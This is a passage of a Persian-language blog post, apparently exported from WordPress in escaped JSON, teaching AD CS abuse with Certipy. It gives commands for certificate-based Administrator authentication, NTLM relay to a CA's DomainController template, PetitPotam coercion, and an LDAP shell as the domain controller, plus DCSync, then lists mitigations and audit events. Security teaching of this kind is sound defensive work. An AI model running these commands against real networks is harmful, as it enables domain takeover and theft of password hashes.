                                          \u0627\u06cc\u0646 \u062a\u0648\u0627\u0644\u06cc \u0646\u0634\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0628\u0627 \u0628\u0647\u200c\u062f\u0633\u062a \u0622\u0648\u0631\u062f\u0646 \u0633\u0637\u0648\u062d \u062f\u0633\u062a\u0631\u0633\u06cc CA\u060c \u0627\u0632 \u0634\u06a9\u0633\u062a \u0627\u0648\u0644\u06cc\u0647 \u062f\u0631 \u0645\u062c\u0648\u0632\u0647\u0627 \u0639\u0628\u0648\u0631 \u06a9\u0631\u062f\u0647 \u0648 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0645\u0648\u0641\u0642\u06cc\u062a\u200c\u0622\u0645\u06cc\u0632 \u0645\u0633\u06cc\u0631 \u062d\u0645\u0644\u0647\u200c\u06cc Post-Exploitation \u0631\u0627 \u062f\u0646\u0628\u0627\u0644 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.<\/span><\/p>\n
                                          \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0648\u0627\u0647\u06cc<\/strong> Administrator<\/strong><\/span><\/p>\n
                                          \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0641\u0627\u06cc\u0644 \u06af\u0648\u0627\u0647\u06cc .pfx\u060c \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0647 Active Directory \u0627\u0632 \u0637\u0631\u06cc\u0642 Kerberos \u06cc\u0627 Schannel \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0627\u06cc\u0646 \u0631\u0648\u0634\u060c \u0646\u06cc\u0627\u0632\u06cc \u0628\u0647 \u0648\u0627\u0631\u062f \u06a9\u0631\u062f\u0646 \u06af\u0630\u0631\u0648\u0627\u0698\u0647 \u0646\u062f\u0627\u0631\u062f \u0648 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0648\u0631\u062f \u0627\u0639\u062a\u0645\u0627\u062f \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645 \u067e\u0630\u06cc\u0631\u0641\u062a\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n
                                          certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.20<\/span><\/pre>\n
                                           <\/p>\n
                                          \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0627\u0645\u06a9\u0627\u0646 \u0648\u0631\u0648\u062f \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645 \u0628\u0627 \u062f\u0633\u062a\u0631\u0633\u06cc Domain Administrator \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f\u061b \u0686\u0647 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u06cc\u06a9 \u06af\u0648\u0627\u0647\u06cc \u062c\u0639\u0644\u06cc \u0627\u06cc\u062c\u0627\u062f\u0634\u062f\u0647 \u0628\u0627 \u06a9\u0644\u06cc\u062f \u062e\u0635\u0648\u0635\u06cc CA\u060c \u06cc\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u06af\u0648\u0627\u0647\u06cc \u0635\u0627\u062f\u0631\u0634\u062f\u0647 \u062a\u0648\u0633\u0637 SubCA \u062a\u062d\u062a \u06a9\u0646\u062a\u0631\u0644 \u0645\u0647\u0627\u062c\u0645. \u062f\u0631 \u0646\u062a\u06cc\u062c\u0647\u060c \u0645\u0647\u0627\u062c\u0645 \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0633\u0631\u0642\u062a \u06cc\u0627 \u06a9\u0631\u06a9 \u06a9\u0631\u062f\u0646 \u0631\u0645\u0632\u0639\u0628\u0648\u0631\u060c \u0628\u0647 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0627\u0645\u0644 \u062f\u0627\u0645\u0646\u0647 \u062f\u0633\u062a \u0645\u06cc\u200c\u06cc\u0627\u0628\u062f.<\/span><\/p>\n
                                          \"\"<\/span><\/p>\n
                                          \u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u06a9\u0644\u06cc\u062f\u0647\u0627\u06cc<\/strong> CA <\/strong>\u062f\u0631 \u062f\u0633\u062a\u0631\u0633 \u0646\u06cc\u0633\u062a\u0646\u062f<\/strong><\/span><\/p>\n
                                          \u062f\u0631 \u0634\u0631\u0627\u06cc\u0637\u06cc \u06a9\u0647 \u06a9\u0644\u06cc\u062f \u062e\u0635\u0648\u0635\u06cc CA \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u0645\u0647\u0627\u062c\u0645 \u0646\u06cc\u0633\u062a\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc Network Coercion \u0648 Relay Attacks \u0628\u0647 \u0646\u062a\u0627\u06cc\u062c\u06cc \u0645\u0634\u0627\u0628\u0647 \u062f\u0633\u062a \u06cc\u0627\u0641\u062a\u2014\u06cc\u0639\u0646\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 Domain Controller\u2014\u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0633\u062a\u0642\u06cc\u0645 \u0628\u0647 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u06cc\u0627 \u062f\u06cc\u06af\u0631 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u06a9\u0627\u0631\u0628\u0631\u06cc.<\/span><\/p>\n
                                          \u0631\u0644\u0647 \u06a9\u0631\u062f\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0647 \u0633\u0645\u062a<\/strong> CA<\/strong><\/span><\/p>\n
                                          \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0645\u0647\u0627\u062c\u0645 \u06cc\u06a9 Relay Server \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0628\u0647 Web Enrollment Endpoint \u0645\u062a\u0639\u0644\u0642 \u0628\u0647 Certification Authority \u0645\u062a\u0635\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0627\u0632 \u0642\u0627\u0644\u0628\u06cc (Template) \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u062e\u0648\u062f\u06a9\u0627\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646 \u0631\u0627 \u0635\u0627\u062f\u0631 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u0645\u0627\u0646\u0646\u062f \u0642\u0627\u0644\u0628 DomainController.<\/span><\/p>\n
                                          certipy-ad relay -target 192.168.1.17 -template DomainController<\/span><\/pre>\n
                                           <\/p>\n
                                          \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u0633\u06cc\u0633\u062a\u0645 \u0631\u0627 \u0622\u0645\u0627\u062f\u0647 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f \u062a\u0627 \u06cc\u06a9 \u0627\u0631\u062a\u0628\u0627\u0637 NTLM coerced (\u062a\u062d\u0645\u06cc\u0644\u06cc) \u0631\u0627 \u0627\u0632 \u06cc\u06a9 Domain Controller \u062f\u0631\u06cc\u0627\u0641\u062a \u06a9\u0631\u062f\u0647 \u0648 \u0627\u0632 \u0622\u0646 \u0628\u0631\u0627\u06cc \u0627\u0631\u0633\u0627\u0644 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f.<\/span><\/p>\n
                                          \"\"<\/span><\/p>\n
                                          \u0648\u0627\u062f\u0627\u0631 \u06a9\u0631\u062f\u0646<\/strong> Domain Controller <\/strong>\u0628\u0647 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632<\/strong> PetitPotam<\/strong><\/span><\/p>\n
                                          \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0627\u0632 \u0627\u0628\u0632\u0627\u0631 PetitPotam \u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc \u06cc\u06a9 \u062d\u0645\u0644\u0647 Coercion \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u06cc\u06a9 Domain Controller \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0646\u0627\u062e\u0648\u0627\u0633\u062a\u0647 \u0628\u0647 Relay Server \u062a\u062d\u062a \u06a9\u0646\u062a\u0631\u0644 \u0645\u0647\u0627\u062c\u0645 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u06a9\u0646\u062f. \u0627\u06cc\u0646 \u0639\u0645\u0644 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u067e\u0631\u0648\u062a\u06a9\u0644\u200c\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f MS-EFSRPC \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f.<\/span><\/p>\n
                                          python PetitPotam.py -u raj -p Password@1 192.168.1.12 192.168.1.14<\/span><\/pre>\n
                                           <\/p>\n
                                          \u062f\u0631 \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631:<\/span><\/p>\n
                                            \n
                                          • \u06f1\u06f9\u06f2\u066b\u06f1\u06f6\u06f8\u066b\u06f1\u066b\u06f1\u06f2 \u0622\u062f\u0631\u0633 IP \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 Domain Controller \u0647\u062f\u0641 \u0627\u0633\u062a.<\/span><\/li>\n
                                          • \u06f1\u06f9\u06f2\u066b\u06f1\u06f6\u06f8\u066b\u06f1\u066b\u06f1\u06f4 \u0622\u062f\u0631\u0633 IP \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 Relay Server \u062a\u062d\u062a \u06a9\u0646\u062a\u0631\u0644 \u0645\u0647\u0627\u062c\u0645 \u0627\u0633\u062a.<\/span><\/li>\n<\/ul>\n
                                            \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0628\u0627\u0639\u062b \u0627\u0631\u0633\u0627\u0644 \u06cc\u06a9 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a NTLM \u0627\u0632 \u0633\u0648\u06cc Domain Controller \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0627\u06cc\u0646 \u0627\u0631\u062a\u0628\u0627\u0637 NTLM \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062a\u0648\u0633\u0637 \u0645\u0647\u0627\u062c\u0645 Capture \u0634\u062f\u0647 \u0648 \u0628\u0647 Certification Authority (CA) \u0631\u0644\u0647 (Relay) \u0634\u0648\u062f \u062a\u0627 \u0627\u0632 \u0622\u0646 \u0628\u0631\u0627\u06cc \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u062c\u0639\u0644\u06cc \u0648 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a PKI \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06af\u0631\u062f\u062f.<\/span><\/p>\n
                                            \"\"<\/span><\/p>\n
                                            \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646: \u0627\u062c\u0631\u0627\u06cc \u0645\u062c\u062f\u062f \u062d\u0645\u0644\u0647<\/strong> Relay <\/strong>\u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632<\/strong> Certipy<\/strong><\/span><\/p>\n
                                            \u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u0627\u062a\u0635\u0627\u0644 \u0646\u0627\u067e\u0627\u06cc\u062f\u0627\u0631 \u0628\u0627\u0634\u062f \u06cc\u0627 \u062a\u0644\u0627\u0634 \u0627\u0648\u0644\u06cc\u0647 \u0628\u0631\u0627\u06cc Coercion \u0645\u0648\u0641\u0642\u06cc\u062a\u200c\u0622\u0645\u06cc\u0632 \u0646\u0628\u0648\u062f\u0647 \u0628\u0627\u0634\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0645\u062c\u062f\u062f\u0627\u064b \u062f\u0633\u062a\u0648\u0631 Relay \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0631\u062f \u062a\u0627 \u0633\u0631\u0648\u0631 \u0631\u0644\u0647 \u0641\u0639\u0627\u0644 \u0628\u0627\u0642\u06cc \u0628\u0645\u0627\u0646\u062f \u0648 \u0641\u0631\u0622\u06cc\u0646\u062f \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc \u0628\u0647\u200c\u062f\u0631\u0633\u062a\u06cc \u062a\u06a9\u0645\u06cc\u0644 \u0634\u0648\u062f.<\/span><\/p>\n
                                            certipy-ad relay -target 192.168.1.17 -template DomainController<\/span><\/pre>\n
                                             <\/p>\n
                                            \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631:<\/span><\/p>\n
                                              \n
                                            • \u0633\u0631\u0648\u0631 \u0631\u0644\u0647 \u0631\u0627 \u0645\u062c\u062f\u062f\u0627\u064b \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u06cc\u0627 \u062f\u0631 \u0648\u0636\u0639\u06cc\u062a \u0622\u0645\u0627\u062f\u0647\u200c\u0628\u0627\u0634 \u0646\u06af\u0647 \u0645\u06cc\u200c\u062f\u0627\u0631\u062f.<\/span><\/li>\n
                                            • \u0628\u0647 \u0642\u0627\u0644\u0628 DomainController \u0645\u062a\u0635\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u062e\u0648\u062f\u06a9\u0627\u0631 \u06af\u0648\u0627\u0647\u06cc \u0645\u0627\u0634\u06cc\u0646 \u0635\u0627\u062f\u0631 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n<\/ul>\n
                                              \u0627\u06cc\u0646 \u0631\u0648\u0634 \u062f\u0631 \u0645\u062d\u06cc\u0637\u200c\u0647\u0627\u06cc\u06cc \u0628\u0627 \u0627\u062a\u0635\u0627\u0644 \u0646\u0627\u067e\u0627\u06cc\u062f\u0627\u0631 \u0634\u0628\u06a9\u0647 \u06cc\u0627 \u0645\u0648\u0627\u0631\u062f\u06cc \u06a9\u0647 \u062a\u0644\u0627\u0634 \u0627\u0628\u062a\u062f\u0627\u06cc\u06cc \u0628\u0631\u0627\u06cc \u0648\u0627\u062f\u0627\u0631\u0633\u0627\u0632\u06cc Domain Controller \u0628\u0647 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a (NTLM Coercion) \u0628\u0627 \u0634\u06a9\u0633\u062a \u0645\u0648\u0627\u062c\u0647 \u0634\u062f\u0647\u060c \u0628\u0633\u06cc\u0627\u0631 \u0645\u0641\u06cc\u062f \u0627\u0633\u062a.<\/span><\/p>\n
                                              \"\"<\/span><\/p>\n
                                              \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646<\/strong> Domain Controller<\/strong><\/span><\/p>\n
                                              \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0645\u0647\u0627\u062c\u0645 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0648\u0627\u0647\u06cc \u0635\u0627\u062f\u0631\u0634\u062f\u0647 \u0628\u0631\u0627\u06cc Domain Controller\u060c \u0641\u0631\u0622\u06cc\u0646\u062f \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0631\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 PKINIT (Public Key Cryptography for Initial Authentication in Kerberos) \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u062f\u0647\u062f \u0648 \u06cc\u06a9 \u0646\u0634\u0633\u062a LDAP \u0631\u0627 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 Domain Controller \u0622\u063a\u0627\u0632 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n
                                              certipy-ad auth -pfx dc1.pfx -dc-ip 192.168.1.14 -ldap-shell<\/span><\/pre>\n
                                               <\/p>\n
                                              \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631:<\/span><\/p>\n
                                                \n
                                              • \u0627\u0632 \u0641\u0627\u06cc\u0644 .pfx \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u06af\u0648\u0627\u0647\u06cc Domain Controller \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n
                                              • \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0631\u0627 \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631\u060c \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u06a9\u0627\u0645\u0644 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u062f\u0647\u062f.<\/span><\/li>\n
                                              • \u06cc\u06a9 LDAP Shell \u0645\u0639\u062a\u0628\u0631 \u0628\u0627 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc Domain Controller \u0628\u0631\u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n<\/ul>\n
                                                \u0628\u0627 \u0627\u06cc\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc\u060c \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0627\u0632 \u0642\u0627\u0628\u0644\u06cc\u062a DCSync \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f \u06a9\u0647 \u0627\u0645\u06a9\u0627\u0646 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0647\u0634\u200c\u0647\u0627\u06cc \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 Active Directory \u2014 \u0634\u0627\u0645\u0644 \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0633\u0637\u062d \u0628\u0627\u0644\u0627 \u0645\u0627\u0646\u0646\u062f Enterprise Admins \u2014 \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f. \u0627\u06cc\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0639\u0627\u062f\u0644 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0627\u0645\u0644 \u0628\u0631 \u062f\u0627\u0645\u0646\u0647 \u0627\u0633\u062a.<\/span><\/p>\n
                                                \"\"<\/span><\/p>\n
                                                \u0627\u0642\u062f\u0627\u0645\u0627\u062a \u0645\u0642\u0627\u0628\u0644\u0647\u200c\u0627\u06cc<\/strong> (Mitigation)<\/strong><\/span><\/p>\n
                                                \u0628\u0631\u0627\u06cc \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a Active Directory Certificate Services (AD CS) \u0648 \u062d\u0645\u0644\u0627\u062a \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc\u060c \u0627\u0642\u062f\u0627\u0645\u0627\u062a \u0632\u06cc\u0631 \u062a\u0648\u0635\u06cc\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f:<\/span><\/p>\n
                                                \u0633\u062e\u062a\u200c\u0633\u0627\u0632\u06cc \u0648 \u0645\u0645\u06cc\u0632\u06cc \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc<\/strong> (Certificate Templates):<\/strong><\/span>
                                                \n\u0628\u0631\u0631\u0633\u06cc \u062f\u0642\u06cc\u0642 \u0648 \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc (\u0645\u0627\u0646\u0646\u062f SubCA \u06cc\u0627 DomainController) \u06a9\u0647 \u0627\u0645\u06a9\u0627\u0646 \u0635\u062f\u0648\u0631 \u062e\u0648\u062f\u06a9\u0627\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627 \u0631\u0627 \u062f\u0627\u0631\u0646\u062f. \u0627\u0632 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632 \u0628\u0627\u0644\u0627 \u0628\u062f\u0648\u0646 \u062a\u0623\u06cc\u06cc\u062f \u0686\u0646\u062f\u0645\u0631\u062d\u0644\u0647\u200c\u0627\u06cc \u062e\u0648\u062f\u062f\u0627\u0631\u06cc \u0634\u0648\u062f.<\/span><\/p>\n
                                                \u06a9\u0646\u062a\u0631\u0644 \u0645\u062c\u0648\u0632\u0647\u0627\u06cc \u0646\u0648\u0634\u062a\u0646 \u062f\u0631<\/strong> AD (<\/strong>\u0627\u0632 \u062c\u0645\u0644\u0647<\/strong> “Enroll”):<\/strong><\/span>
                                                \n\u0628\u0631\u0631\u0633\u06cc \u0648 \u0645\u062d\u062f\u0648\u062f\u0633\u0627\u0632\u06cc Write Permissions \u062f\u0631 \u0627\u0634\u06cc\u0627\u0621 \u062d\u0633\u0627\u0633 Active Directory \u0634\u0627\u0645\u0644:<\/span><\/p>\n
                                                  \n
                                                • \u0645\u062c\u0648\u0632 Enroll \u0628\u0631\u0627\u06cc \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc<\/span><\/li>\n
                                                • \u0627\u06cc\u062c\u0627\u062f \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u06cc<\/span><\/li>\n
                                                • \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 Shadow Credentials<\/span><\/li>\n<\/ul>\n
                                                  \u0645\u0645\u06cc\u0632\u06cc \u06a9\u0627\u0645\u0644 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0648 \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u062f\u0631 \u0633\u0637\u062d<\/strong> CA:<\/strong><\/span>
                                                  \n\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u0648 \u067e\u0627\u06cc\u0634 \u0631\u062e\u062f\u0627\u062f\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0632\u06cc\u0631 \u062f\u0631 \u0644\u0627\u06af\u200c\u0647\u0627\u06cc \u0648\u06cc\u0646\u062f\u0648\u0632:<\/span><\/p>\n
                                                    \n
                                                  • Event ID 4886 \u2013 \u06af\u0648\u0627\u0647\u06cc \u0635\u0627\u062f\u0631 \u0634\u062f\u0647<\/span><\/li>\n
                                                  • Event ID 4887 \u2013 \u062a\u063a\u06cc\u06cc\u0631 \u062f\u0631 CA \u06cc\u0627 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0645\u0631\u062a\u0628\u0637<\/span><\/li>\n<\/ul>\n
                                                    \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc Web Enrollment \u0648 NTLM (\u062f\u0631 \u0635\u0648\u0631\u062a \u0627\u0645\u06a9\u0627\u0646):<\/span>
                                                    \n\u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Web Enrollment (CEP\/CES) \u0636\u0631\u0648\u0631\u06cc \u0646\u06cc\u0633\u062a\u060c \u0622\u0646 \u0631\u0627 \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u06a9\u0646\u06cc\u062f. \u0647\u0645\u0686\u0646\u06cc\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 NTLM Authentication \u0631\u0627 \u0645\u062d\u062f\u0648\u062f \u06cc\u0627 \u0628\u0647\u200c\u0637\u0648\u0631 \u06a9\u0627\u0645\u0644 \u062d\u0630\u0641 \u0646\u0645\u0627\u06cc\u06cc\u062f \u0648 \u0628\u0647 Kerberos with PKINIT \u062a\u06a9\u06cc\u0647 \u06a9\u0646\u06cc\u062f.<\/span><\/p>\n
                                                     <\/p>\n","protected":false},"excerpt":{"rendered":"
                                                    \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy \u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645. \u0686\u0647 \u062f\u0631 \u062d\u0627\u0644 …<\/p>\n","protected":false},"author":14,"featured_media":19915,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,258,349],"tags":[],"class_list":["post-19879","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-agility","category-teaching","category-slides"],"yoast_head":"\n\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646<\/title>\n<meta name=\"description\" content=\"\u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 